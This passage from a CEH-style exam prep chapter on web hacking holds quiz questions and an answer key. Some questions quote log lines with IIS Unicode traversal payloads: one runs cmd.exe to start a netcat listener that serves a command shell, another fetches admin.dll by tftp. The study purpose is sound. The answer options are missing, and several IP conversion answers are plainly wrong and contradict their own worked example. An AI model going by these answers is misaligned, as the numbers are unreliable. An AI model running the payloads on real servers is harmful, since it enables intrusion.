Web and databases security are an important part of the overall security of the organization. During a penetration test, it's something that you can expect to be asked to review.
Okay, now that the title of this exercise has your attention, let's discuss the exercise. In this exercise, you will examine the Foundstone HackMeBank SQL portal. You will need to have MSSQL and IIS loaded on a Windows XP system to complete the exercise.
Estimated Time: 1 hour.
Exam Prep Questions
You have noticed the following in your logs. What was the attacker trying to do?
[View full width]GET/%c0%af..%c0%af..%c0%af..%c0%af..C:/mydocuments/home/cmd.exe? /c+nc+-l+-p+8080+-e+cmd .exe HTTP/1.1
Which of the following best describes HTTP?
When discussing passwords, what is considered a brute force attack?
What does the following command achieve?
Telnet HEAD /HTTP/1.0
You found the following address in your log files: 0xde.0xaa.0xce.0x1a. What is the IP address in decimal?
What form of authentication takes a username and a random nonce and combines them?
While performing a penetration test for your client, you discovered the following on their e-commerce website:
Which of the following should you note in your report?
Which of the following is a best defense against the Unicode vulnerability on an unpatched IIS server?
While conducting a penetration test for a new client, you noticed that they had several databases. After testing one, you got the following response:
Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified error in asp file line 82:
What is the problem?
You have been asked to investigate a breach of security. An attacker has been successful at modifying the purchase price of an item. You have verified that no entries were found in the IDS, and the SQL databases show no indication of compromise. How did this attack most likely occur?
What form of authentication is characterized by its use of cleartext?
You have found the following address in your logs and are unsure of its origins. You tried to ping the address ping 2605306123, and it even came back as a valid address. What is the corresponding real IP?
Which of the following will let you assume a user's identity at a dynamically generated web page or site?
Your web logs reveal the following:
GET /c/winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20GET%20admin.dll%20c:admin.dll
What does this mean?
Which of the following tools is used for web-based password cracking?
Answers to Exam Questions
1. D. The purpose of the entry was an attempt to install Netcat as a listener on port 8080 to shovel a command shell back to the attacker. Answers A, B, and C are incorrect. The attack is not attempting to replace cmd.exe, it is not exploiting double decode, and it is not attempting to execute the Linux xterm command.
2. D. Although HTTP uses TCP as a transport, it is considered a stateless connection because the TCP session does not stay open waiting for multiple requests and their responses. Answer A is incorrect, as HTTP is not based on UDP; it is TCP based. Answer B is incorrect because HTTP is considered stateless. Answer C is incorrect because HTTP is not based on ICMP.
3. C. A brute force attack attempts every single possibility until you exhaust all possible combinations of words and characters or discover the password. Answer A is incorrect, as it describes a dictionary attack. Answer B is incorrect, as using a rainbow table created from a dictionary is not an example of a brute force attack. Answer D is incorrect because threatening someone with bodily harm is not a brute force attack.
4. D. This command returns the banner of the website specified by IP address. Answers A, B, and C are incorrect because this command does not open a backdoor Telnet session on the client, it does not start a Netcat listener, and it does not return a banner from a URL, as an IP address is specified in the command.
5. A. 0xde.0xaa.0xce.0x1a hexadecimal converted to base10 gives 126.96.36.199. Answers B, C, and D are therefore incorrect.
6. A. It uses the username, the password, and a nonce value to create an encrypted value that is passed to the server. Answer B is incorrect, as password authentication protocol (PAP) sends information in cleartext. Answer C is incorrect because Certification authentication uses the PKI infrastructure. Answer D is incorrect, as forms-based authentication is based on the use of a cookie.
7. B. When attackers discover the hidden price field, they might attempt to alter it and reduce the price. To avoid this problem, hidden price fields should not be used. However, if they are used, the value should be confirmed before processing. Answer A is incorrect because value name field will not affect the fact that someone might attempt to lower the price of the item. Answer C is incorrect, as again, the PID has no effect on this price altering possibility. Answer D is incorrect because the hidden field should not be expanded. If attackers can change the hidden field to a larger value and submit a long string, there is a possibility that they can crash the server.
8. A. File traversal will not work from one logical drive to another; therefore, the attack would be unsuccessful. Answer B would not prevent an attacker from exploiting the Unicode vulnerability. Answer C is incorrect, as no TFTP server is required on the IIS system for the attack to be successful. Answer D is a possibility, and renaming the file would slow down the attacker; however, there is still the chance that he might guess what it has been renamed. Security by obscurity should never be seen as a real defense.
9. D. SQL injection is a type of exploit whereby hackers are able to execute SQL statements via an Internet browser. You can test for it using logic, such as 1=1, or inserting a single '. Answer A is incorrect because this is not an Oracle database. Answer B is incorrect, as it is not a MySQL database. Answer C is incorrect, as 80004005 indicates a potential for SQL injection.
10. B. Changing the hidden tag value from a local copy of the web page would allow an attacker to alter the prices without tampering with the SQL database or any alerts being raised on the IDS. Therefore, answers A, C, and D are incorrect.
11. B. Password authentication protocol (PAP) allows the client to authenticate itself by sending a username and password to the server in cleartext. The technique is vulnerable to sniffers who might try obtaining the password by sniffing the network connection. Answer A is incorrect, as message digest is secured by using hashing algorithms such as MD5 in combination with a random nonce. Answer C is incorrect because certificate authentication uses PKI. Answer D is incorrect because forms authentication can use a cookie to store the encrypted password.
12. B. Converting 2605306123 base10 to octet reveals 188.8.131.52. For example, to convert the number 184.108.40.206 to base 10, first convert to binary 10011011010010011101000100001011, and then divide into four bytes:
10011011 = 155
01001001 = 73
11010001 = 209
00001011 = 11
Then, convert each back to decimal, 220.127.116.11. Therefore, answers A, C, and D are incorrect.
13. B. Cross site scripting (XSS) lets you assume a user's identity at a dynamically generated web page or site by exploiting the stateless architecture of the Internet. It works by performing cookie theft. The attacker tricks the victim into passing him the cookie through XSS. After the attacker gains the cookie, he sends the cookie to the web server and spoofs the identity of the victim. To get the cookie using a script attack, the attacker needs to craft a special form, which posts back the value of document cookie to his site. Answer A is incorrect because the question does not define a buffer overflow attack. Answer C is incorrect because the question does not define a SQL attack, and. Answer D is not a possibility. File traversal attacks occur when the attacker can move from one directory to another with valid permissions.
14. C. The Nimda worm modifies all web content files it finds and bases its attack on the same vulnerability that is seen in the Unicode vulnerability. Answers A, B, and D are incorrect because the log entry does not indicate the Morris worm, blaster, or a double decode attack. Identifying admin.dll is one way to identify this as a Nimda attack.
15. A. ObiWan is used for password cracking. Answers B, C, and D are incorrect because SQLSmack is a Linux SQL hacking tool, Wikto is a web assessment tool, and N-Stealth is a web vulnerability tool. Knowing which tools are used in each step of the web hacking methodology is an important goal of the CEH exam. You should spend a portion of your time preparing for the test practicing with the tools and learning to understand their output.
Suggested Reading and Resources
http://www.intellicatalog.com/HiddenFieldFraud.cfmHidden field fraud
http://eyeonsecurity.org/papers/passport.htmMicrosoft Passport authentication
www.cgisecurity.com/articles/xss-faq.shtmlXSS attacks and methods
Wireless Technologies, Security, and Attacks